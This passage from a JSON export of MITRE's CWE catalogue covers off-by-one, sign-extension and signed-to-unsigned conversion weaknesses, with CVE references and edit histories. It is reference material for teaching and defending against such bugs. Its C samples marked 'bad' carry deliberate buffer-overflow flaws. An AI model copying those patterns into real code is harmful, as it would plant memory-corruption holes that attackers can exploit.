NULL;showWidgets(WidgetList);","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Incorrect number of widgets requested!\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"WidgetList[i] = InitializeWidget();","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"However, this code contains an off-by-one calculation error (CWE-193). It allocates exactly enough space to contain the specified number of widgets, but it does not include the space for the NULL pointer. As a result, the allocated buffer is smaller than it is supposed to be (CWE-131). So if the user ever requests MAX_NUM_WIDGETS, there is an out-of-bounds write (CWE-787) when the NULL is assigned. Depending on the environment and compilation settings, this could cause memory corruption."},{"Intro_Text":"In this example, the code does not account for the terminating null character, and it writes one byte beyond the end of the buffer.","Body_Text":["The first call to strncat() appends up to 20 characters plus a terminating null character to fullname[]. There is plenty of allocated space for this, and there is no weakness associated with this first call. However, the second call to strncat() potentially appends another 20 characters. The code does not account for the terminating null character that is automatically added by strncat(). This terminating null character would be written one byte beyond the end of the fullname[] buffer. Therefore an off-by-one error exists with the second strncat() call, as the third argument should be 19.","When using a function like strncat() one must leave a free byte at the end of the buffer for a terminating null character, thus avoiding the off-by-one weakness. Additionally, the last argument to strncat() is the number of characters to append, which must be less than the remaining space in the buffer. Be careful not to just use the total size of the buffer."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char firstname[20];char lastname[20];char fullname[40];fullname[0] = \'\\\\0\';strncat(fullname, firstname, 20);strncat(fullname, lastname, 20);","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"char firstname[20];char lastname[20];char fullname[40];fullname[0] = \'\\\\0\';strncat(fullname, firstname, sizeof(fullname)-strlen(fullname)-1);strncat(fullname, lastname, sizeof(fullname)-strlen(fullname)-1);","xhtml:br":["","","","","","",""]}}]},{"Intro_Text":"The Off-by-one error can also be manifested when reading characters from a character array within a for loop that has an incorrect continuation condition.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define PATH_SIZE 60char filename[PATH_SIZE];for(i=0; i&lt;=PATH_SIZE; i++) {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char c = getc();if (c == \'EOF\') {}filename[i] = getc();","xhtml:br":["","",""],"xhtml:div":{"#text":"filename[i] = \'\\\\0\';","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"for(i=0; i&lt;PATH_SIZE; i++) {...","xhtml:br":""}}],"Body_Text":"In this case, the correct continuation condition is shown below."},{"Intro_Text":"As another example the Off-by-one error can occur when using the sprintf library function to copy a string variable to a formatted string variable and the original string variable comes from an untrusted source. As in the following example where a local function, setFilename is used to store the value of a filename to a database but first uses sprintf to format the filename. The setFilename function includes an input parameter with the name of the file that is used as the copy source in the sprintf function. The sprintf function will copy the file name to a char array of size 20 and specifies the format of the new variable as 16 characters followed by the file extension .dat.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int setFilename(char *filename) {}","xhtml:div":{"#text":"char name[20];sprintf(name, \\"%16s.dat\\", filename);int success = saveFormattedFilenameToDB(name);return success;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"However this will cause an Off-by-one error if the original filename is exactly 16 characters or larger because the format of 16 characters with the file extension is exactly 20 characters and does not take into account the required null terminator that will be placed at the end of the string."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0252","Description":"Off-by-one error allows remote attackers to cause a denial of service and possibly execute arbitrary code via requests that do not contain newlines.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0252"},{"Reference":"CVE-2001-1391","Description":"Off-by-one vulnerability in driver allows users to modify kernel memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1391"},{"Reference":"CVE-2002-0083","Description":"Off-by-one error allows local users or remote malicious servers to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0083"},{"Reference":"CVE-2002-0653","Description":"Off-by-one buffer overflow in function usd by server allows local users to execute arbitrary code as the server user via .htaccess files with long entries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0653"},{"Reference":"CVE-2002-0844","Description":"Off-by-one buffer overflow in version control system allows local users to execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0844"},{"Reference":"CVE-1999-1568","Description":"Off-by-one error in FTP server allows a remote attacker to cause a denial of service (crash) via a long PORT command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1568"},{"Reference":"CVE-2004-0346","Description":"Off-by-one buffer overflow in FTP server allows local users to gain privileges via a 1024 byte RETR command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0346"},{"Reference":"CVE-2004-0005","Description":"Multiple buffer overflows in chat client allow remote attackers to cause a denial of service and possibly execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0005"},{"Reference":"CVE-2003-0356","Description":"Multiple off-by-one vulnerabilities in product allow remote attackers to cause a denial of service and possibly execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0356"},{"Reference":"CVE-2001-1496","Description":"Off-by-one buffer overflow in server allows remote attackers to cause a denial of service and possibly execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1496"},{"Reference":"CVE-2004-0342","Description":"This is an interesting example that might not be an off-by-one.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0342"},{"Reference":"CVE-2001-0609","Description":"An off-by-one enables a terminating null to be overwritten, which causes 2 strings to be merged and enable a format string.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0609"},{"Reference":"CVE-2002-1745","Description":"Off-by-one error allows source code disclosure of files with 4 letter extensions that match an accepted 3-letter extension.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1745"},{"Reference":"CVE-2002-1816","Description":"Off-by-one buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1816"},{"Reference":"CVE-2002-1721","Description":"Off-by-one error causes an snprintf call to overwrite a critical internal variable with a null value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1721"},{"Reference":"CVE-2003-0466","Description":"Off-by-one error in function used in many products leads to a buffer overflow during pathname management, as demonstrated using multiple commands in an FTP server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0466"},{"Reference":"CVE-2003-0625","Description":"Off-by-one error allows read of sensitive memory via a malformed request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0625"},{"Reference":"CVE-2006-4574","Description":"Chain: security monitoring product has an off-by-one error that leads to unexpected length values, triggering an assertion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4574"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Off-by-one Error"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-155"}},{"attr":{"@_External_Reference_ID":"REF-156"}},{"attr":{"@_External_Reference_ID":"REF-157"}},{"attr":{"@_External_Reference_ID":"REF-140","@_Section":"Chapter 7, &#34;Buffer Overflow&#34;"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, &#34;Off-by-One Errors&#34;, Page 180"}}]},"Notes":{"Note":[{"#text":"This is not always a buffer overflow. For example, an off-by-one error could be a factor in a partial comparison, a read from the wrong memory location, an incorrect conditional, etc.","attr":{"@_Type":"Relationship"}},{"#text":"Under-studied. It requires careful code analysis or black box testing, where inputs of excessive length might not cause an error. Off-by-ones are likely triggered by extensive fuzzing, with the attendant diagnostic problems.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"194":{"attr":{"@_ID":"194","@_Name":"Unexpected Sign Extension","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs an operation on a number that causes it to be sign extended when it is transformed into a larger data type. When the original number is negative, this can produce unexpected values that lead to resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Other"],"Impact":["Read Memory","Modify Memory","Other"],"Note":"When an unexpected sign extension occurs in code that operates directly on memory buffers, such as a size value or a memory index, then it could cause the program to write or read outside the boundaries of the intended buffer. If the numeric value is associated with an application-level resource, such as a quantity or price for a product in an e-commerce site, then the sign extension could produce a value that is much higher (or lower) than the application\'s allowable range."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Avoid using signed variables if you don\'t need to represent negative values. When negative values are needed, perform validation after you save those values to larger data types, or before passing them to functions that are expecting unsigned values."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-23"},"Intro_Text":"The following code reads a maximum size and performs a sanity check on that size. It then performs a strncpy, assuming it will not exceed the boundaries of the array. While the use of \\"short s\\" is forced in this particular example, short int\'s are frequently used within real-world code, such as code that processes structured data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int GetUntrustedInt () {}void main (int argc, char **argv) {}","xhtml:div":[{"#text":"return(0x0000FFFF);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char path[256];char *input;int i;short s;unsigned int sz;i = GetUntrustedInt();s = i;/* s is -1 so it passes the safety check - CWE-697 */if (s &gt; 256) {}/* s is sign-extended and saved in sz */sz = s;/* output: i=65535, s=-1, sz=4294967295 - your mileage may vary */printf(\\"i=%d, s=%d, sz=%u\\\\n\\", i, s, sz);input = GetUserInput(\\"Enter pathname:\\");/* strncpy interprets s as unsigned int, so it\'s treated as MAX_INT(CWE-195), enabling buffer overflow (CWE-119) */strncpy(path, input, s);path[255] = \'\\\\0\'; /* don\'t want CWE-170 */printf(\\"Path is: %s\\\\n\\", path);","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","",""],"xhtml:div":{"#text":"DiePainfully(\\"go away!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}}}],"xhtml:br":["",""]}},"Body_Text":"This code first exhibits an example of CWE-839, allowing \\"s\\" to be a negative number. When the negative short \\"s\\" is converted to an unsigned integer, it becomes an extremely large positive integer. When this converted integer is used by strncpy() it will lead to a buffer overflow (CWE-119)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-10887","Description":"Chain: unexpected sign extension (CWE-194) leads to integer overflow (CWE-190), causing an out-of-bounds read (CWE-125)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10887"},{"Reference":"CVE-1999-0234","Description":"Sign extension error produces -1 value that is treated as a command separator, enabling OS command injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0234"},{"Reference":"CVE-2003-0161","Description":"Product uses \\"char\\" type for input character. When char is implemented as a signed type, ASCII value 0xFF (255), a sign extension produces a -1 value that is treated as a program-specific separator value, effectively disabling a length check and leading to a buffer overflow. This is also a multiple interpretation error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0161"},{"Reference":"CVE-2007-4988","Description":"chain: signed short width value in image processor is sign extended during conversion to unsigned int, which leads to integer overflow and heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4988"},{"Reference":"CVE-2006-1834","Description":"chain: signedness error allows bypass of a length check; later sign extension makes exploitation easier.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1834"},{"Reference":"CVE-2005-2753","Description":"Sign extension when manipulating Pascal-style strings leads to integer overflow and improper memory copy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2753"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Sign extension error"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"CWE More Specific"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-161"}},{"attr":{"@_External_Reference_ID":"REF-162"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":[{"#text":"Sign extension errors can lead to buffer overflows and other memory-based problems. They are also likely to be factors in other weaknesses that are not based on memory operations, but rely on numeric calculation.","attr":{"@_Type":"Relationship"}},{"#text":"This entry is closely associated with signed-to-unsigned conversion errors (CWE-195) and other numeric errors. These relationships need to be more closely examined within CWE.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-05","Modification_Comment":"complete rewrite of the entire entry"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations, References"}],"Previous_Entry_Name":[{"#text":"Sign Extension Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Incorrect Sign Extension","attr":{"@_Date":"2008-11-24"}}]}},"195":{"attr":{"@_ID":"195","@_Name":"Signed to Unsigned Conversion Error","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a signed primitive and performs a cast to an unsigned primitive, which can produce an unexpected value if the value of the signed primitive can not be represented using an unsigned primitive.","Extended_Description":{"xhtml:p":["It is dangerous to rely on implicit casts between signed and unsigned numbers because the result can take on an unexpected value and violate assumptions made by the program.","Often, functions will return negative values to indicate a failure. When the result of a function is to be used as a size parameter, using these negative return values can have unexpected results. For example, if negative size values are passed to the standard memory copy or allocation functions they will be implicitly cast to a large unsigned value. This may lead to an exploitable buffer overflow or underflow condition."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Note":"Conversion between signed and unsigned values can lead to a variety of errors, but from a security standpoint is most commonly associated with integer overflow and buffer overflow vulnerabilities."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-73"},"Intro_Text":"In this example the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned int, amount will be implicitly converted to unsigned.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned int readdata () {}","xhtml:div":{"#text":"int amount = 0;...if (result == ERROR)amount = -1;...return amount;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},"Body_Text":"If the error condition in the code above is met, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers."},{"attr":{"@_Demonstrative_Example_ID":"DX-74"},"Intro_Text":"In this example, depending on the return value of accecssmainframe(), the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned value, amount will be implicitly cast to an unsigned number.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned int readdata () {}","xhtml:div":{"#text":"int amount = 0;...amount = accessmainframe();...return amount;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}},"Body_Text":"If the return value of accessmainframe() is -1, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers."},{"attr":{"@_Demonstrative_Example_ID":"DX-21"},"Intro_Text":"The following code is intended to read an incoming packet from a socket and extract one or more headers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"DataPacket *packet;int numHeaders;PacketHeader *headers;sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet-&gt;headers;if (numHeaders &gt; 100) {}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers);","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"#text":"ExitError(\\"too many headers!\\");","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow."},{"Intro_Text":"This example processes user input comprised of a series of variable-length structures. The first 2 bytes of input dictate the size of the structure to be processed.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* processNext(char* strm) {}","xhtml:div":{"#text":"char buf[512];short len = *(short*) strm;strm += sizeof(len);if (len &lt;= 512) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"memcpy(buf, strm, len);process(buf);return strm + len;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"return -1;","attr":{"@_style":"margin-left:10px;"}}]}}},"Body_Text":"The programmer has set an upper bound on the structure size: if it is larger than 512, the input will not be processed. The problem is that len is a signed short, so the check against the maximum structure length is done with signed values, but len is converted to an unsigned integer for the call to memcpy() and the negative bit will be extended to result in a huge value for the unsigned integer. If len is negative, then it will appear that the structure has an appropriate size (the if branch will be taken), but the amount of memory copied by memcpy() will be quite large, and the attacker will be able to overflow the stack with data in strm."},{"attr":{"@_Demonstrative_Example_ID":"DX-114"},"Intro_Text":"In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int returnChunkSize(void *) {}int main() {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["","","","","",""],"xhtml:i":["/* if chunk info is valid, return the size of usable memory,","* else, return -1 to indicate an error","*/"]}},{"#text":"...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},"Body_Text":"If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788)."},{"attr":{"@_Demonstrative_Example_ID":"DX-138"},"Intro_Text":"This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function\'s action.","Example_Code":{"#text":"int proc_msg(char *s, int msg_len){}char *s = \\"preamble: message\\\\n\\";char *sl = strchr(s, \':\');        // Number of characters up to \':\' (not including space)int jnklen = sl == NULL ? 0 : sl - s;    // If undefined pointer, use zero lengthint ret_val = proc_msg (\\"s\\",  jnklen);    // Violate assumption of preamble length, end up with negative value, blow out stack","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"int pre_len = sizeof(\\"preamble: \\");char buf[pre_len - msg_len];","xhtml:i":["// Note space at the end of the string - assume all strings have preamble with space","... Do processing here if we get this far"],"xhtml:br":["","",""]}},"Body_Text":"The buffer length ends up being -1, resulting in a blown out stack. The space character after the colon is included in the function calculation, but not in the caller\'s calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2007-4268","Description":"Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Signed to unsigned conversion error"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"CWE More Specific"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Type Conversions&#34;, Page 223"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated 